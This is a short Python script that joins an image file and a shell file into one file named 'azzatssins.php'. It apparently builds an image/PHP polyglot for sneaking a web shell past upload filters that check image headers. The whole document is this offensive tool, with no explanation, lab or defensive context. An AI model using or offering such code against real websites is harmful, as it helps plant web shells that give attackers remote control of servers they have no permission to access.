from sys import argv script, img, shell = argv i = open(img,'rb').read() i += open(shell,'rb').read() f = open('azzatssins.php','wb').write(i)